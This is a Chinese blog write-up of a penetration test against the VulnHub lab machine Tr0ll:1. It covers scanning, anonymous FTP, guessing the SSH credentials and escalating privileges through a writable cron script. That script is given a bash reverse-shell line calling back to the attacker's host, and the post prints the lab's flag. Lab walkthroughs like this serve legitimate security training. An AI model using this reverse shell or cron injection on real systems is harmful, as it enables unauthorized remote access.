Tr0ll:1 靶机渗透测试流程

最新推荐文章于 2024-10-06 08:39:05 发布
最新推荐文章于 2024-10-06 08:39:05 发布
阅读量99 收藏
点赞数
文章标签: 网络 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131794492
版权

靶机下载地址

Tr0ll: 1 ~ VulnHub

信息收集

主机探测

sudo nmap -sn 10.10.10.0/24

初步扫描 

sudo nmap -sT --min-rate 10000 -p- 10.10.10.12

可知开放3个端口

21/tcp open  ftp

22/tcp open  ssh

80/tcp open  http

详细扫描 

sudo nmap -sT -sC -sV -O -p 21,22,80 10.10.10.12

21/tcp open  ftp     vsftpd 3.0.2 可匿名登录,有一个lol.pcap文件,看文件后缀是一个wireshark或者tcpdump的文件。

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu)) 

Http-enum:

/secret/

Running: Linux 3.X|4.X

漏洞脚本扫描 

sudo nmap -sT --script=vuln -p 21,22,80 10.10.10.12  

只有DOS漏洞。

UDP扫描 

sudo nmap -sU --top-ports 100 10.10.10.12

渗透流程

web渗透

登录FTP下载文件,用strings查看,发现提示我们有一个sup3rs3cr3tdirlol
就是超级秘密目录,但是ftp里面没有其它目录,估计就是web上面的目录。

发现确实有这样一个目录,下面有一个文件。

 查看内容发现是二进制

 

运行发现打印了Find address 0x0856BF to proceed

说的是找到一个地址,估计其实就是是一个路径。

 

访问得到两个目录,猜测就是账户密码

结构

good_luck-----------------------------------------|

                which_one_lol.txt

                        maleus

                        ps-aux

                        felux

                        Eagle11

                        genphlux < -- Definitely not this one

                        usmc8892

                        blawrg

                        wytshadow

                        vis1t0r

                        overflow

this_folder_contains_the_password------|

                Pass.txt

                        Good_job_:)

SSH登录

经过多次尝试和猜测,终于是用overflow Pass.txt成功SSH登录。期间尝试过密码喷射,但是密码实际是文件名而不是文件里的内容。

权限提升

 寻找计划任务日志文件,因为没权限直接看/etc/crontab

find / -name cronlog 2>/dev/null

成功发现一个/var/log/cronlog

找到计划任务执行的文件/lib/log/cleaner.py,用ls -l查看该文件所有人可读写执行。 可以用多种方法提权,我这里用反弹shell。

 

写入反弹shell

os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.2/4444 0>&1'")

KALI开启监听

成功反弹shell,提权成功,flag为:702a8c18d29c6f3ca0d99ef5712bfbdc 

总结

通过FTP登录得到一个pcap文件,通过分析该文件得到一个目录,并根据后续的提示成功拿到SSH登录的用户名密码,最终通过计划任务提权,总体来说难度不高。

Teardrop、
关注
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶机渗透测试(Tre: 1)
@小张小张的博客
09-21 975
靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:182.168.10.175;
tomato靶机渗透测试
weixin_49340699的博客
07-28 1427
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
【oscp系列-Tr0ll-1】靶机4
weixin_44807430的博客
01-16 547
知行合一
红队打靶:Troll1打靶思路详解(vulnhub)
Bossfrank的博客
07-06 826
本文是vulnhub靶机Troll的详细打靶过程。涉及到的知识点包括FTP匿名登录、strings命令、密码喷射crackmapexec、定时任务提权等。靶机本身不复杂,但关键是有一些命令的操作。包括strings查看文件的文本信息、binwalk查看捆绑文件、file命令查看文件信息。如果不使用这些命令,可能会遗漏很多重要信息。
Vulnhub靶机系列:Tr0ll: 1
汗的博客
03-31 1611
这次的靶机是Vulnhub靶机Tr0ll: 1 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/tr0ll-1%2C100/ 文件大小: 434 MB MD5: 318FE0B1C0DD4FA0A8DCA43EDACE8B20 SHA1: 9C459ED10166ACAB9B7D8...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个...通过深入研究和实践这些靶机,新手能够逐渐熟悉渗透测试的流程和技术,为未来从事网络安全工作打下坚实的基础。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
靶机渗透测试Tr0ll: 1)
@小张小张的博客
12-14 1188
靶机渗透测试Tr0ll: 1): Vulnhub靶机 Tr0ll: 1 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Beginner)) 描述:The goal is simple, gain root and get Proof.txt from the /root directory 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192
VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 609
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第一部分 信息收集 第一步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
Tr0ll:1靶机-Walkthrough
ins1ght的博客
09-14 2284
Tr0ll:1靶机,比较基础,提供了2种思路和5种提权方法。
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1228
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
毕业设计——springboot+netty+websocket实现一个简单的ChatGpt机器人聊天
【CSDN】
09-29 919
WebSocket是html5开始浏览器和服务端进行全双工通信的网络技术。在该协议下,与服务端只需要一次握手,之后建立一条快速通道,开始互相传输数据,实际是基于TCP双向全双工,比http半双工提高了很大的性能,常用于网络在线聊天室等。申请key的教程在项目resources目录readme.md文件中。1、接入了chatGpt接口,只需要替换成自己的key就行。2、实现了与机器人的聊天,可以优化做成智能客服。
从零开始实现RPC框架---------项目介绍及环境准备
qq_41934502的博客
10-02 413
从零开始实现rpc架构项目介绍
【华为HCIP实战课程六】OSPF邻居关系排错网络子网掩码问题,网络工程师
最新发布
Bert_Wang的博客
10-06 119
因为R3和R4直连的链路为PPP链路,则可以学到对端链路的32位主机路由,可以正常建立OSPF邻居关系。R3和R4虽然不在同一网段,此时R3是可以ping通R4的互联地址 10.1.34.4。R3仍然可以正常和R4建立邻居关系,因为此时虽然没有对端直连路由但是有对端ospf路由。R4可以查看对端的接口的ospf路由,可以正常建立ospf邻居关系。此时我们把R3和R4链路类型更改为HDLC。R3和R4已经建立正常的ospf邻居关系。更改IP地址前R3接口IP地址。
【STM32】 TCP/IP通信协议(3)--LwIP网络接口
m0_73409202的博客
09-30 648
LwIP协议栈支持多种不同的,由于网卡是直接跟硬件平台打交道,硬件不同则处理也是不同。那Iwip如何兼容这些不同的网卡呢?LwIP提供统一的接口,底层函数需要用户自行完成,例如网卡的初始化、接收和发送数据等。当LwIP底层接收到网络数据时,需要经过层层递交才会传入内核处理;相反,LwIP发送数据时也会调用网卡的发送数据。对于没有接触过LwIP的人新手来说,我们如何编写这个底层代码呢?不用担心,LwIP提供了一个ethernetif.c 文件作为底层接口的驱动模版。用户只根据自己的网络设备进行参照修改即可。
HTTP协议讲解,请求报文与响应报文都是什么?网络控制台查看HTTP请求
m0_70325779的博客
09-30 974
服务器拒绝用户请求,有可能因为用户的权限不足,没有相应的访问权限,紧接着刚才的401,401是用户没有验证身份,如果用户验证了身份,但是没有访问权限,就会爆出403。而我们本地启动自己的项目代码的时候,是可以看到HTML文件和JS文件的,还可以在JS文件中打断点进行调试,如下图,我启动了本地的前端项目,可以看到这里就有JS文件和HTML文件,我们将鼠标点击在行头,就可以标记断点进行调试,如下图蓝色的三行几位断点,当JS代码运行到此处时,就会卡住,和我们使用IDEA进行DEBUG一样的道理。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值